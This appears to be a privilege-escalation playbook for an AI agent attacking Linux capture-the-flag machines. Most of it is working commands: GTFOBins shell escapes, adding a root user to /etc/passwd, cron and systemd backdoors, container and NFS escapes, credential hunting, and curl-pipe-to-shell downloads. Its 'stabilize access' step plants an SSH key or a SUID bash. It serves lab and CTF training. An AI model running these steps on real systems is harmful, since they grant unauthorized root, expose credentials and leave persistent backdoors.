Agent Skills: Privilege Escalation Knowledge Base

Privilege Escalation Knowledge Base

Purpose

This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag.

Layered Privilege Escalation Strategy

Core Principle: Escalate systematically through 3 layers - from quick wins to exhaustive enumeration.

Layer Framework:

Layer 1 (Quick Wins - Manual):
  - Check most common vectors immediately
  - Goal: Find easy privesc within 2-3 minutes
  - Focus: sudo -l, SUID, obvious misconfigurations
  - Time: 2-5 minutes

Layer 2 (Deep Enumeration - Automated):
  - Run comprehensive enumeration tools
  - Goal: Find all possible privesc vectors
  - Focus: linpeas, linenum, pspy
  - Time: 5-15 minutes

Layer 3 (Alternative Methods):
  - Try less common vectors or kernel exploits
  - Goal: Find overlooked or complex privesc paths
  - Focus: Kernel exploits, container escape, NFS, etc.
  - Time: Variable

Escalation Triggers:

• Layer 1 finds nothing obvious → Run Layer 2 enumeration
• Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives
• Layer 3 fails → Re-examine reconnaissance, may have missed service/config

Core Strategy

Systematic execution:

1. Quick Wins (Layer 1): Check easy vectors first (sudo, SUID, capabilities)
2. Deep Enumeration (Layer 2): Use automated tools to find all vectors
3. Alternative Vectors (Layer 3): Kernel exploits, container escape, NFS
4. Exploitation: Execute chosen privesc method
5. Root Flag: Locate and read root.txt
6. Verification: Confirm root access with id, whoami

Tools Available

Enumeration Scripts

• linpeas.sh - Comprehensive automated enumeration
• linenum.sh - Alternative enumeration script
• pspy - Monitor processes without root

Manual Commands

• sudo -l - Check sudo permissions
• find / -perm -4000 2>/dev/null - Find SUID binaries
• getcap -r / 2>/dev/null - Find capabilities
• crontab -l - Check user cron jobs
• cat /etc/crontab - Check system cron jobs

References

• GTFOBins (https://gtfobins.github.io/) - SUID/sudo exploitation
• PayloadsAllTheThings - Privesc cheatsheet

Enumeration Workflow

Phase 1: Quick Manual Checks

Execute these immediately:

# 1. Check current user and groups
id
groups

# 2. Check sudo permissions (most common vector)
sudo -l

# 3. Check SUID binaries
find / -perm -4000 -type f 2>/dev/null

# 4. Check writable files in /etc
find /etc -writable -type f 2>/dev/null

# 5. Check for interesting files
ls -la /home/*/
ls -la /root/
ls -la /opt/
ls -la /var/www/html/

# 6. Check running processes
ps aux | grep root

# 7. Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l

# 8. Check capabilities
getcap -r / 2>/dev/null

Phase 2: Automated Enumeration

Download and run linpeas:

# Download linpeas
cd /tmp
wget http://YOUR_IP:8000/linpeas.sh
# Or
curl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh

# Make executable
chmod +x linpeas.sh

# Run and save output
./linpeas.sh > linpeas-output.txt 2>&1

# Review output
cat linpeas-output.txt | grep -i "PEASS\|password\|ssh\|priv"

If can't download, use one-liner:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Common Privilege Escalation Vectors

1. Sudo Abuse (Most Common)

# Check what you can run as root
sudo -l

# Common exploitable commands:
# - vim: sudo vim -c ':!/bin/sh'
# - nano: sudo nano, then Ctrl+R Ctrl+X, type: reset; sh 1>&0 2>&0
# - less: sudo less /etc/profile, then !sh
# - man: sudo man man, then !sh
# - find: sudo find . -exec /bin/sh \; -quit
# - awk: sudo awk 'BEGIN {system("/bin/sh")}'
# - perl: sudo perl -e 'exec "/bin/sh";'
# - python: sudo python -c 'import pty;pty.spawn("/bin/bash")'
# - git: sudo git -p help config, then !sh

# GTFOBins template:
# 1. Identify binary you can sudo
# 2. Search GTFOBins for that binary
# 3. Follow exploitation steps

2. SUID Binaries

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Compare with standard SUID binaries
# Unusual ones are interesting

# Common exploitable SUID binaries:
# - /usr/bin/python
# - /usr/bin/perl
# - /usr/bin/php
# - /usr/bin/vim
# - /usr/bin/find
# - /usr/bin/nmap (old versions)
# - Custom binaries

# Exploitation examples:

# Python SUID
/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")'

# Vim SUID
/usr/bin/vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

# Find SUID
/usr/bin/find . -exec /bin/sh -p \; -quit

# Check GTFOBins for specific binary

3. Capabilities

# Find capabilities
getcap -r / 2>/dev/null

# Exploitable capabilities:
# - cap_setuid+ep on python/perl/ruby
# - cap_dac_read_search for reading any file

# Python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# Perl with cap_setuid
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'

4. Writable /etc/passwd

# Check if /etc/passwd is writable
ls -la /etc/passwd

# If writable, add root user
echo 'hacker:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd

# Or simpler (password: hacker)
echo 'hacker::0:0:root:/root:/bin/bash' >> /etc/passwd

# Login as new root user
su hacker

5. Cron Jobs

# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# Look for:
# 1. Scripts run as root
# 2. Writable by your user

# If found writable script run by root
echo '#!/bin/bash\nchmod +s /bin/bash' > /path/to/script.sh

# Wait for cron to run (check schedule)
# Then execute
/bin/bash -p

6. Writable Service Files

# Check for writable systemd services
find /etc/systemd/system/ -writable 2>/dev/null

# If found, modify ExecStart
[Service]
ExecStart=/bin/bash -c 'chmod +s /bin/bash'

# Restart service
systemctl restart vulnerable.service

# Execute SUID bash
/bin/bash -p

7. Kernel Exploits (Last Resort)

# Check kernel version
uname -a
uname -r

# Search for kernel exploits
searchsploit "linux kernel $(uname -r)"
searchsploit "ubuntu privilege escalation"

# Common kernel exploits:
# - DirtyCOW (CVE-2016-5195)
# - Dirty Pipe (CVE-2022-0847)
# - PwnKit (CVE-2021-4034)

# Example: Dirty Pipe
wget http://YOUR_IP:8000/dirtypipe.c
gcc dirtypipe.c -o dirtypipe
./dirtypipe

8. Docker/Container Escape

# Check if in Docker
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker

# If docker socket is accessible
find / -name docker.sock 2>/dev/null

# If found /var/run/docker.sock
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Or check for privileged container
fdisk -l
# If you can see host disks, you're privileged

9. Credentials in Files

# Search for passwords
grep -r "password" /var/www/html/ 2>/dev/null
grep -r "pass" /etc/ 2>/dev/null
find / -name "*.config" -o -name "*.conf" 2>/dev/null | xargs grep -i "password"

# Check history files
cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null

# Check for SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

# Database credentials
cat /var/www/html/config.php
cat /var/www/html/wp-config.php

10. NFS Exports

# Check NFS exports
cat /etc/exports

# If no_root_squash is set
# Mount on attacker machine:
mkdir /tmp/mount
mount -t nfs TARGET:/share /tmp/mount
# Create SUID binary as root on attacker
cp /bin/bash /tmp/mount/bash
chmod +s /tmp/mount/bash
# Execute on target
/share/bash -p

Exploitation Process

Step 1: Identify Vector

Based on enumeration, choose best vector:

1. Sudo permissions - Highest priority, usually easiest
2. SUID binaries - Check against GTFOBins
3. Capabilities - Less common but powerful
4. Cron jobs - May require waiting
5. Kernel exploits - Last resort, can crash system

Step 2: Execute Privesc

# Example: Sudo vim exploitation

# 1. Verify you can run it
sudo -l
# Output: (root) NOPASSWD: /usr/bin/vim

# 2. Execute vim as root
sudo vim

# 3. In vim, type:
:set shell=/bin/bash
:shell

# 4. Verify root
id
# Output: uid=0(root) gid=0(root)

Step 3: Stabilize Root Access

Once root, ensure you can maintain access:

# Add SUID to bash (backup method)
chmod +s /bin/bash

# Or add SSH key
mkdir -p /root/.ssh
echo 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Root Flag Capture

Locate Root Flag

# Common locations
cat /root/root.txt
cat /root/flag.txt

# Search if not found
find /root -name "*.txt" 2>/dev/null
find / -name "root.txt" 2>/dev/null

Verify Flag Format

# Should be 32-character hex string
cat /root/root.txt | wc -c  # Should be 33 (32 + newline)
cat /root/root.txt | grep -E '^[a-f0-9]{32}$'

Update State

# Save root flag
ROOT_FLAG=$(cat /root/root.txt)
echo "Root flag: $ROOT_FLAG"

# Update state file (if accessible)
jq --arg flag "$ROOT_FLAG" '.flags.root = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json

Troubleshooting

Can't Download Tools

# Method 1: Python HTTP server (on attacker)
python3 -m http.server 8000

# Method 2: Base64 transfer
# On attacker:
base64 linpeas.sh | xclip -selection clipboard
# On target:
echo 'BASE64_STRING' | base64 -d > linpeas.sh

# Method 3: Use built-in tools only
# Manual enumeration with find, grep, etc.

No Write Permissions

# Try /tmp
cd /tmp
# Or /dev/shm
cd /dev/shm
# Or current user home
cd ~

Stuck/No Vectors Found

# Re-run enumeration more carefully
# Check linpeas output for anything yellow/red
cat linpeas-output.txt | grep -E "PEASS|95%|99%"

# Check for overlooked vectors:
# 1. Environment variables with passwords
env | grep -i "pass\|pwd\|key"

# 2. Process command lines
ps auxww | grep -i "password\|pass"

# 3. World-writable scripts
find / -perm -002 -type f 2>/dev/null

# 4. Misconfigured files
ls -la /etc/shadow /etc/passwd

# 5. Backup files
find / -name "*.bak" -o -name "*.backup" 2>/dev/null

Output Format

After successful privilege escalation:

{
  "status": "root_access_gained",
  "method": "Sudo vim exploitation via GTFOBins",
  "vector": "sudo -l showed vim with NOPASSWD",
  "root_flag": "f6e5d4c3b2a1098765432109876543210",
  "exploitation_time": "2 minutes",
  "mission_complete": true
}

Success Criteria

Mission complete when:

1. ✅ Root access obtained (uid=0)
2. ✅ Root flag located and read
3. ✅ Flag is 32-character hexadecimal string
4. ✅ Both user and root flags captured
5. ✅ State file updated with both flags

Decision Tree

Initial Access Gained
│
├─ Run: sudo -l
│  ├─ Can sudo something? → GTFOBins → Root
│  └─ No sudo → Continue
│
├─ Find SUID binaries
│  ├─ Found unusual SUID? → GTFOBins → Root
│  └─ No exploitable SUID → Continue
│
├─ Check capabilities
│  ├─ cap_setuid on python/perl? → Exploit → Root
│  └─ No caps → Continue
│
├─ Check cron jobs
│  ├─ Writable script run as root? → Backdoor → Wait → Root
│  └─ No cron → Continue
│
├─ Run linpeas
│  └─ Follow red/yellow findings
│
└─ Kernel exploit (last resort)
   └─ Search and compile exploit

Key Principles

1. Systematic approach - Don't skip steps, check everything
2. Quick wins first - sudo before kernel exploits
3. GTFOBins is your friend - Use it for SUID/sudo
4. Verify before claiming - Ensure you have actual root
5. Capture the flag - Read root.txt content, not just location
6. Non-interactive aware - Some exploits need TTY, adapt accordingly

Remember

• Most playground machines have obvious privesc vectors
• Sudo misconfigurations are most common
• SUID binaries are second most common
• Kernel exploits are rarely needed in playgrounds
• The root flag MUST be read - don't declare success without it
• Document successful method for learning and future reference

Mission Complete

When you can execute:

# whoami
root
# cat /root/root.txt
a1b2c3d4e5f6789... (32-char hex)

Mission accomplished! Update coordinator with both flags.